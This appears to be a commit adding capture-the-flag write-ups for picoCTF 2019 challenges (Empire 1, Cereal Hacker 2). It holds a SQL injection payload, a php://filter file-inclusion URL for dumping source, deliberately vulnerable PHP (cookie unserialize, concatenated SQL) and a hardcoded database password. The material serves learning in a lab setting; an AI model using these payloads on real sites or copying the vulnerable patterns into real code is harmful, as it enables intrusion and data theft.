[writeup] add picoctf 2019 (part)

Author: onealmond

README.md

@@ -37,6 +37,9 @@
 - [SecondLife](picoctf-2019/SecondLife/shellcode.py)
 - [Heap Overflow](picoctf-2019/HeapOverflow/shellcode.py)
 - [Cereal Hacker 1](picoctf-2019/cereal-hacker1/writeup.md)
+- [Cereal Hacker 2](picoctf-2019/cereal-hacker2/writeup.md)
+- [Irish-Name-Repo 1](picoctf-2019/Irish-Name-Repo-1/writeup.md)
+- [Empire 1](picoctf-2019/Empire1)
 
 # Hacker101 CTF
 - [MicroCMS v2](hacker101-ctf/micro-cms-v2/writeup.md)

picoctf-2019/Empire1/writeup.md

@@ -0,0 +1,18 @@
+* Register a new user and sign in, now we are allowed to create a todo, list todos and list employee.
+* In the todo creation page we have an input box to some text.
+* Try to create a todo. It result in internal error with ``'``, but ``''`` works.
+* There may be tables ``todo``, ``user`` in databases.
+
+The todo creation is to insert a record into the ``todo`` table, the SQL would be like ``INSERT INTO todo VALUES (userid, 'content')``.
+
+Tried out the following line
+```
+'||(select secret from user where secret like 'pico%' limit 1)||'
+```
+
+The insert SQL becomes
+```
+INSERT INTO todos VALUES (userid, ''||(select secret from user where secret like 'pico%' limit 1)||''
+```
+
+Now go to ``Your Todos``, the flag is displayed.

picoctf-2019/cereal-hacker2/admin.php

@@ -0,0 +1,49 @@
+<?php
+
+require_once('cookie.php');
+
+if(isset($perm) && $perm->is_admin()){
+?>
+	
+	<body>
+		<div class="container">
+			<div class="row">
+				<div class="col-sm-9 col-md-7 col-lg-5 mx-auto">
+					<div class="card card-signin my-5">
+						<div class="card-body">
+							<h5 class="card-title text-center">Welcome to the admin page!</h5>
+							<h5 style="color:blue" class="text-center">Flag: Find the admin's password!</h5>
+						</div>
+					</div>
+				</div>
+			</div>
+		</div>
+
+	</body>
+
+<?php
+}
+else{
+?>
+	
+	<body>
+		<div class="container">
+			<div class="row">
+				<div class="col-sm-9 col-md-7 col-lg-5 mx-auto">
+					<div class="card card-signin my-5">
+						<div class="card-body">
+							<h5 class="card-title text-center">You are not admin!</h5>
+							<form action="index.php" method="get">
+								<button class="btn btn-lg btn-primary btn-block text-uppercase" name="file" value="login" type="submit" onclick="document.cookie='user_info=; expires=Thu, 01 Jan 1970 00:00:18 GMT; domain=; path=/;'">Go back to login</button>
+							</form>
+						</div>
+					</div>
+				</div>
+			</div>
+		</div>
+
+	</body>
+
+<?php
+}
+?>

picoctf-2019/cereal-hacker2/cookie.php

@@ -0,0 +1,91 @@
+<?php
+
+require_once('../sql_connect.php');
+
+// I got tired of my php sessions expiring, so I just put all my useful information in a serialized cookie
+class permissions
+{
+	public $username;
+	public $password;
+	
+	function __construct($u, $p){
+		$this->username = $u;
+		$this->password = $p;
+	}
+
+	function is_admin(){
+		global $sql_conn;
+		if($sql_conn->connect_errno){
+			die('Could not connect');
+		}
+		//$q = 'SELECT admin FROM pico_ch2.users WHERE username = \''.$this->username.'\' AND (password = \''.$this->password.'\');';
+		
+		if (!($prepared = $sql_conn->prepare("SELECT admin FROM pico_ch2.users WHERE username = ? AND password = ?;"))) {
+		    die("SQL error");
+		}
+
+		$prepared->bind_param('ss', $this->username, $this->password);
+	
+		if (!$prepared->execute()) {
+		    die("SQL error");
+		}
+		
+		if (!($result = $prepared->get_result())) {
+		    die("SQL error");
+		}
+
+		$r = $result->fetch_all();
+		if($result->num_rows !== 1){
+			$is_admin_val = 0;
+		}
+		else{
+			$is_admin_val = (int)$r[0][0];
+		}
+		
+		$sql_conn->close();
+		return $is_admin_val;
+	}
+}
+
+/* legacy login */
+class siteuser
+{
+	public $username;
+	public $password;
+	
+	function __construct($u, $p){
+		$this->username = $u;
+		$this->password = $p;
+	}
+
+	function is_admin(){
+		global $sql_conn;
+		if($sql_conn->connect_errno){
+			die('Could not connect');
+		}
+		$q = 'SELECT admin FROM pico_ch2.users WHERE admin = 1 AND username = \''.$this->username.'\' AND (password = \''.$this->password.'\');';
+		
+		$result = $sql_conn->query($q);
+		if($result->num_rows != 1){
+			$is_user_val = 0;
+		}
+		else{
+			$is_user_val = 1;
+		}
+		
+		$sql_conn->close();
+		return $is_user_val;
+	}
+}
+
+
+if(isset($_COOKIE['user_info'])){
+	try{
+		$perm = unserialize(base64_decode(urldecode($_COOKIE['user_info'])));
+	}
+	catch(Exception $except){
+		die('Deserialization error.');
+	}
+}
+
+?>

picoctf-2019/cereal-hacker2/sql_connect.php

@@ -0,0 +1,11 @@
+<?php
+
+
+$sql_server = 'localhost';
+$sql_user = 'mysql';
+$sql_pass = 'this1sAR@nd0mP@s5w0rD#%';
+$sql_conn = new mysqli($sql_server, $sql_user, $sql_pass);
+$sql_conn_login = new mysqli($sql_server, $sql_user, $sql_pass);
+
+
+?>

picoctf-2019/cereal-hacker2/writeup.md

@@ -0,0 +1,22 @@
+
+By checking different value for ``file``, it seems combine the parameters with ``.php`` suffix as the argument for inclusion. But the content of the files aren't directly accessible. How about ```php://filter``.
+
+
+```
+https://2019shell1.picoctf.com/problem/62195/index.php?file=php://filter/convert.base64-encode/resource=admin
+```
+It print a long base64-encoded string. By decoding it we have the ``admin.php`` file.
+
+```
+base64 -d <<< PD9waHAKCnJlcXVpcmVfb25jZSgnY29va2llLnBocCcpOwoKaWYoaXNzZXQoJHBlcm0pICYmICRwZXJtLT5pc19hZG1pbigpKXsKPz4KCQoJPGJvZHk+CgkJPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCQkJPGRpdiBjbGFzcz0icm93Ij4KCQkJCTxkaXYgY2xhc3M9ImNvbC1zbS05IGNvbC1tZC03IGNvbC1sZy01IG14LWF1dG8iPgoJCQkJCTxkaXYgY2xhc3M9ImNhcmQgY2FyZC1zaWduaW4gbXktNSI+CgkJCQkJCTxkaXYgY2xhc3M9ImNhcmQtYm9keSI+CgkJCQkJCQk8aDUgY2xhc3M9ImNhcmQtdGl0bGUgdGV4dC1jZW50ZXIiPldlbGNvbWUgdG8gdGhlIGFkbWluIHBhZ2UhPC9oNT4KCQkJCQkJCTxoNSBzdHlsZT0iY29sb3I6Ymx1ZSIgY2xhc3M9InRleHQtY2VudGVyIj5GbGFnOiBGaW5kIHRoZSBhZG1pbidzIHBhc3N3b3JkITwvaDU+CgkJCQkJCTwvZGl2PgoJCQkJCTwvZGl2PgoJCQkJPC9kaXY+CgkJCTwvZGl2PgoJCTwvZGl2PgoKCTwvYm9keT4KCjw/cGhwCn0KZWxzZXsKPz4KCQoJPGJvZHk+CgkJPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCQkJPGRpdiBjbGFzcz0icm93Ij4KCQkJCTxkaXYgY2xhc3M9ImNvbC1zbS05IGNvbC1tZC03IGNvbC1sZy01IG14LWF1dG8iPgoJCQkJCTxkaXYgY2xhc3M9ImNhcmQgY2FyZC1zaWduaW4gbXktNSI+CgkJCQkJCTxkaXYgY2xhc3M9ImNhcmQtYm9keSI+CgkJCQkJCQk8aDUgY2xhc3M9ImNhcmQtdGl0bGUgdGV4dC1jZW50ZXIiPllvdSBhcmUgbm90IGFkbWluITwvaDU+CgkJCQkJCQk8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJnZXQiPgoJCQkJCQkJCTxidXR0b24gY2xhc3M9ImJ0biBidG4tbGcgYnRuLXByaW1hcnkgYnRuLWJsb2NrIHRleHQtdXBwZXJjYXNlIiBuYW1lPSJmaWxlIiB2YWx1ZT0ibG9naW4iIHR5cGU9InN1Ym1pdCIgb25jbGljaz0iZG9jdW1lbnQuY29va2llPSd1c2VyX2luZm89OyBleHBpcmVzPVRodSwgMDEgSmFuIDE5NzAgMDA6MDA6MTggR01UOyBkb21haW49OyBwYXRoPS87JyI+R28gYmFjayB0byBsb2dpbjwvYnV0dG9uPgoJCQkJCQkJPC9mb3JtPgoJCQkJCQk8L2Rpdj4KCQkJCQk8L2Rpdj4KCQkJCTwvZGl2PgoJCQk8L2Rpdj4KCQk8L2Rpdj4KCgk8L2JvZHk+Cgo8P3BocAp9Cj8+Cg== > admin.php
+```
+
+
+The file depends on another one, ``cookie.php``.
+```
+require_once('cookie.php');
+```
+
+Fetch ``https://2019shell1.picoctf.com/problem/62195/index.php?file=php://filter/convert.base64-encode/resource=cookie`` and decode, we found the SQL to verify admin login in ``cookie.php`` and another file ``sql_connect.php``.
+
+From ``sql_connect`` we got the database credentials. Connect to mysql server from shell server, the flag is in ``pico_ch2``.``users`` table.